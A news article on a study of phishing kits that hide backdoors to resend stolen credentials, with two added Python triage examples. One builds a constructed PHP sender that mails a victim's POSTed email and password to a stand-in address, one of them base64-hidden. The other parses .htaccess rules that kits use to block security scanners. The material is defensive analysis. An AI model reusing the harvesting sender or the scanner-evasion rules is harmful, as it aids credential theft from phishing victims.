A study of 3,200 unique phishing kits has found that 200 of the kits contained a backdoor, allowing the seller to claim compromised websites without doing the leg work.
The study, by Jordan Wright, a researcher at Duo Labs, the research arm of two-factor authentication firm Duo Security, looked at 3,200 unique phishing kits that were found after scanning 66,000 suspected phishing URLs.
Phishing kits have been around for a few years, offering a package of tools for reusing across multiple phishing campaigns, such as fake login pages for PayPal, Office 365, banking sites and so on, multi-language support, methods for validating credentials that victims enter, and redirects to the real page.
As noted by Wright, the kits, which are often bundled in .zip files, are usually uploaded to a host that has been compromised through a CMS vulnerability; the attacker then sends phishing emails with links to the newly created phishing site. Captured credentials are often emailed to the attacker.
Interestingly, but not surprisingly, Wright found that phishing kit vendors frequently free-ride off customers by hiding backdoors in the kits. One particular backdoor was found in 200 phishing kits.
“This shows that attackers who are selling or distributing these phishing kits to other criminals are actively backdooring them to give themselves access to the compromised hosts. Clearly there's no honor among thieves,” wrote Wright.
Wright’s paper offers a look at how to do large-scale research on phishing kits. He found that many phishing attackers simply leave the .zip files on the compromised server alongside the unpacked kit, allowing anyone to download the kit and analyze it, including what it collects and where it’s sent. The 3,200 kits were found after sifting through 66,000 URLs that had been submitted to the crowdsourced phishing URL feeds PhishTank and OpenPhish over a month.
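To make the two steps above concrete (guessing where a leftover kit archive sits, then reading the kit to see where credentials go and whether a second, hidden recipient has been planted), here is an added Python example. It is not code from Wright's study or from Duo Labs; the archive layout, the sender script and every address in it are constructed for the demonstration, and the only obfuscation it decodes is base64_decode(), which is an assumption about how a hidden recipient might be wrapped, not a catalogue of what real kits do.

```python
"""Triage helpers for leftover phishing kit archives (added example)."""
import base64
import io
import re
import zipfile
from urllib.parse import urlsplit, urlunsplit


def candidate_kit_archives(url: str) -> list[str]:
    """Return likely archive URLs for a phishing page, deepest directory first.

    A kit unpacked at /uploads/secure/login.php was often unzipped in place,
    so /uploads/secure.zip (and, less often, /uploads.zip) may still exist.
    """
    parts = urlsplit(url)
    segments = [s for s in parts.path.split("/") if s]
    if segments and "." in segments[-1]:      # drop the page file name
        segments = segments[:-1]
    candidates = []
    for depth in range(len(segments), 0, -1):
        path = "/" + "/".join(segments[:depth]) + ".zip"
        candidates.append(urlunsplit((parts.scheme, parts.netloc, path, "", "")))
    return candidates


PLAIN_EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Assumption for this example: a hidden recipient is wrapped in base64_decode().
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def mail_recipients(php_source: str) -> dict[str, list[str]]:
    """Split addresses found in a kit script into plain and base64-hidden ones."""
    plain = sorted(set(PLAIN_EMAIL.findall(php_source)))
    hidden = []
    for blob in B64_CALL.findall(php_source):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        hidden.extend(PLAIN_EMAIL.findall(decoded))
    return {"plain": plain, "hidden": sorted(set(hidden))}


def triage_kit(archive_bytes: bytes) -> dict:
    """Walk every PHP file in the kit archive and collect mail recipients."""
    plain, hidden, files = set(), set(), []
    with zipfile.ZipFile(io.BytesIO(archive_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith(".php"):
                continue
            found = mail_recipients(zf.read(name).decode("utf-8", errors="replace"))
            if found["plain"] or found["hidden"]:
                files.append(name)
            plain.update(found["plain"])
            hidden.update(found["hidden"])
    # A recipient that appears only in obfuscated form is the one the kit's
    # buyer did not configure, and therefore the one to look at first.
    return {
        "plain": sorted(plain),
        "hidden": sorted(hidden),
        "files": files,
        "suspect_backdoor": bool(hidden - plain),
    }


def build_sample_kit() -> bytes:
    """Constructed kit archive for the demonstration; not a real kit."""
    hidden = base64.b64encode(b"kit-author@example.net").decode()
    sender_php = (
        "<?php\n"
        '$to = "buyer@example.org";\n'
        '$subject = "Office 365 | " . $_SERVER["REMOTE_ADDR"];\n'
        '$message = "Email: " . $_POST["email"] . "\\nPass: " . $_POST["password"];\n'
        "mail($to, $subject, $message);\n"
        f'mail(base64_decode("{hidden}"), $subject, $message);\n'
        'header("Location: https://login.microsoftonline.com/");\n'
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("kit/index.html", "<form method=post action=post.php></form>")
        zf.writestr("kit/post.php", sender_php)
    return buf.getvalue()


if __name__ == "__main__":
    print(candidate_kit_archives("http://victim.example/uploads/secure/login.php"))
    print(triage_kit(build_sample_kit()))
```

Against the constructed kit, triage_kit reports buyer@example.org as the configured recipient, kit-author@example.net as the one hidden behind base64, and flags the archive as a suspected backdoor because the hidden address never appears in plain text. Real kits use other obfuscations (string concatenation, str_rot13, eval of packed code), so the decoder would need extending; the point is the comparison between what the buyer configured and what the code actually sends to.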
The study looked at tactics phishing kit users use to remain on a compromised server, which included blocking IP ranges for popular threat intelligence services, such as Netcraft, Sophos, abuse.ch, Fortinet and Kaspersky.
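The blocking is usually done with an Apache .htaccess file shipped inside the kit, listing "deny from" rules for the scanners' address ranges. The following added Python example (not part of the study, and with a constructed .htaccess whose ranges are documentation addresses rather than any vendor's real ranges) parses such a file, tells you whether a given source address would be refused, and checks a map of your own crawler egress addresses against the list, which is the question a threat-intel team actually wants answered when a kit returns a 403 to their scanner.

```python
"""Parse a phishing kit's .htaccess blocklist and test addresses against it."""
import ipaddress
import re

# Apache 2.2-style rule: "deny from" followed by one or more tokens, each an
# IP, a CIDR, or a dotted prefix such as "203.0.113." (meaning the /24).
DENY_RULE = re.compile(r"^\s*deny\s+from\s+(.+?)\s*$", re.IGNORECASE)

# Constructed sample modelled on kit blocklists; ranges are RFC 5737 examples.
SAMPLE_HTACCESS = """\
Order Allow,Deny
Allow from all
deny from 192.0.2.0/24
Deny from 198.51.100.7
deny from 203.0.113.
RewriteEngine On
"""


def _to_network(token: str) -> ipaddress.IPv4Network:
    """Turn an Apache address token into a network object."""
    if token.endswith("."):                    # dotted prefix: 203.0.113. -> /24
        octets = token.rstrip(".").split(".")
        padded = ".".join(octets + ["0"] * (4 - len(octets)))
        return ipaddress.ip_network(f"{padded}/{8 * len(octets)}")
    return ipaddress.ip_network(token, strict=False)   # bare IP becomes /32


def parse_deny_rules(text: str) -> list[ipaddress.IPv4Network]:
    """Collect every network denied by the .htaccess text."""
    nets = []
    for line in text.splitlines():
        match = DENY_RULE.match(line)
        if match:
            nets.extend(_to_network(tok) for tok in match.group(1).split())
    return nets


def is_blocked(ip: str, nets: list[ipaddress.IPv4Network]) -> bool:
    """True if the kit would refuse to serve this source address."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def blocked_addresses(nets: list[ipaddress.IPv4Network]) -> int:
    """Total number of addresses the kit refuses to serve."""
    return sum(net.num_addresses for net in nets)


def blocked_scanners(nets, scanners: dict[str, str]) -> list[str]:
    """Names of scanner egress addresses (a constructed mapping) the kit blocks."""
    return sorted(name for name, ip in scanners.items() if is_blocked(ip, nets))


if __name__ == "__main__":
    rules = parse_deny_rules(SAMPLE_HTACCESS)
    print(rules, blocked_addresses(rules))
    # Hypothetical crawler egress addresses for the demonstration.
    print(blocked_scanners(rules, {"crawler-a": "192.0.2.9", "crawler-b": "198.51.100.8"}))
```

Kits written for Apache 2.4 may use "Require not ip" instead, and some block by User-Agent or hostname rather than address; the parser above only reads "deny from" lines, so extend it if a kit returns 403 to your crawler and no rule matches.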
The research found that most phishing kits were hosted on WordPress sites that had likely been compromised. That does not necessarily reflect poorly on WordPress itself, which is by far the most popular CMS in use, followed by others such as Magento.
However, to avoid harming visitors, WordPress users will need to apply another update as soon as possible: WordPress developers released WordPress 4.8.3 today, which contains a security fix for an SQL-injection flaw found by engineer Anthony Ferrara.
He detailed his six-week ordeal in getting WordPress volunteer developers to fix the problem, which was initially brushed off as a non-security issue. He has also posted advice on what site owners should do to remediate the problem.